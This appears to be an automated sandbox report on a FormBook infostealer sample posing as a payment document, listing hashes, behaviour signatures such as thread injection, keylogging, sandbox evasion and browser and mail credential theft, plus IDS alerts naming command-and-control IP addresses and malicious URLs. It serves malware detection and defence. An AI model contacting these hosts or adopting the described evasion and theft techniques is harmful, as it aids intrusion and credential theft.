Edit tour

Windows Analysis Report
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Overview

General Information

Sample name:	Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
Analysis ID:	1589911
MD5:	24516ed0bcff1bb18dd58da6b6919c3e
SHA1:	760d5c65217102892caf3d6313ab3edc7a8548fa
SHA256:	3bc8146fb4903843798975abff071ddbe0b44769e5f6f8ed4850c17daf5c71c8
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe" MD5: 24516ED0BCFF1BB18DD58DA6B6919C3E)

svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

vtTdsKSTqQr.exe (PID: 4948 cmdline: "C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

w32tm.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\w32tm.exe" MD5: E55B6A057FDDD35A7380FB2C6811A8EC)

vtTdsKSTqQr.exe (PID: 2784 cmdline: "C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7976 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine|base64offset|contains: 6b~'*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ParentImage: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ParentProcessId: 7508, ParentProcessName: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ProcessId: 7524, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine|base64offset|contains: 6b~'*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ParentImage: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ParentProcessId: 7508, ParentProcessName: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ProcessId: 7524, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:19:31.792823+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49736	199.59.243.228	80	TCP
2025-01-13T10:20:03.318941+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49832	104.21.13.141	80	TCP
2025-01-13T10:20:17.601041+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49916	15.197.240.20	80	TCP
2025-01-13T10:20:31.291950+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50010	136.243.225.5	80	TCP
2025-01-13T10:20:44.644673+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50020	104.21.18.171	80	TCP
2025-01-13T10:20:57.941444+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50024	199.192.21.169	80	TCP
2025-01-13T10:21:11.478583+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50028	45.130.41.107	80	TCP
2025-01-13T10:21:25.172684+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50032	85.159.66.93	80	TCP
2025-01-13T10:21:38.712173+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50036	199.59.243.228	80	TCP
2025-01-13T10:22:13.142898+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50040	38.22.89.164	80	TCP
2025-01-13T10:22:27.222582+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50044	68.65.122.71	80	TCP
2025-01-13T10:22:58.700369+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50048	103.174.136.137	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:19:31.792823+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49736	199.59.243.228	80	TCP
2025-01-13T10:20:03.318941+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49832	104.21.13.141	80	TCP
2025-01-13T10:20:17.601041+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49916	15.197.240.20	80	TCP
2025-01-13T10:20:31.291950+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50010	136.243.225.5	80	TCP
2025-01-13T10:20:44.644673+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50020	104.21.18.171	80	TCP
2025-01-13T10:20:57.941444+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50024	199.192.21.169	80	TCP
2025-01-13T10:21:11.478583+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50028	45.130.41.107	80	TCP
2025-01-13T10:21:25.172684+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50032	85.159.66.93	80	TCP
2025-01-13T10:21:38.712173+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50036	199.59.243.228	80	TCP
2025-01-13T10:22:13.142898+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50040	38.22.89.164	80	TCP
2025-01-13T10:22:27.222582+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50044	68.65.122.71	80	TCP
2025-01-13T10:22:58.700369+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50048	103.174.136.137	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:19:55.501146+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49779	104.21.13.141	80	TCP
2025-01-13T10:19:58.027663+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49795	104.21.13.141	80	TCP
2025-01-13T10:20:00.595689+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49812	104.21.13.141	80	TCP
2025-01-13T10:20:10.033463+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49868	15.197.240.20	80	TCP
2025-01-13T10:20:11.527719+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49884	15.197.240.20	80	TCP
2025-01-13T10:20:15.114687+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49896	15.197.240.20	80	TCP
2025-01-13T10:20:23.330918+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49957	136.243.225.5	80	TCP
2025-01-13T10:20:25.888137+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49977	136.243.225.5	80	TCP
2025-01-13T10:20:28.783179+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49994	136.243.225.5	80	TCP
2025-01-13T10:20:36.981692+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50017	104.21.18.171	80	TCP
2025-01-13T10:20:39.553568+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50018	104.21.18.171	80	TCP
2025-01-13T10:20:42.087545+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	104.21.18.171	80	TCP
2025-01-13T10:20:50.329479+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	199.192.21.169	80	TCP
2025-01-13T10:20:52.838344+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50022	199.192.21.169	80	TCP
2025-01-13T10:20:55.455625+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50023	199.192.21.169	80	TCP
2025-01-13T10:21:03.831033+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	45.130.41.107	80	TCP
2025-01-13T10:21:06.369860+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	45.130.41.107	80	TCP
2025-01-13T10:21:08.914520+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50027	45.130.41.107	80	TCP
2025-01-13T10:21:18.348878+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	85.159.66.93	80	TCP
2025-01-13T10:21:20.897525+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	85.159.66.93	80	TCP
2025-01-13T10:21:23.458253+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50031	85.159.66.93	80	TCP
2025-01-13T10:21:30.895681+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	199.59.243.228	80	TCP
2025-01-13T10:21:33.452280+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50034	199.59.243.228	80	TCP
2025-01-13T10:21:36.131921+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50035	199.59.243.228	80	TCP
2025-01-13T10:21:45.554645+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50037	38.22.89.164	80	TCP
2025-01-13T10:21:48.114873+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50038	38.22.89.164	80	TCP
2025-01-13T10:21:50.739579+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50039	38.22.89.164	80	TCP
2025-01-13T10:22:19.123445+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50041	68.65.122.71	80	TCP
2025-01-13T10:22:21.584686+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50042	68.65.122.71	80	TCP
2025-01-13T10:22:24.168711+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50043	68.65.122.71	80	TCP
2025-01-13T10:22:51.061567+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50045	103.174.136.137	80	TCP
2025-01-13T10:22:53.606826+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50046	103.174.136.137	80	TCP
2025-01-13T10:22:56.176459+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50047	103.174.136.137	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.811371bb10.buzz/ucix/	Avira URL Cloud: Label: malware
Source: http://www.zucchini.pro/ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	ReversingLabs: Detection: 76%
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Joe Sandbox ML: detected

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: w32tm.pdb source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vtTdsKSTqQr.exe, 00000002.00000002.4152048473.000000000083E000.00000002.00000001.01000000.00000004.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963095315.000000000083E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: w32tm.pdbGCTL source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_009568EE FindFirstFileW,FindClose,	0_2_009568EE
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0095698F
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0094D076
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0094D3A9
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00959642
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0095979D
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0094DBBE
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00959B2B
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00955C97
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DECAA0 FindFirstFileW,FindNextFileW,FindClose,	3_2_00DECAA0

Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4x nop then xor eax, eax		3_2_00DD9E50
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_036304D8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49795 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49832 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49832 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49812 -> 104.21.13.141:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49916 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49916 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49868 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49896 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49977 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 104.21.18.171:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50036 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49994 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 85.159.66.93:80
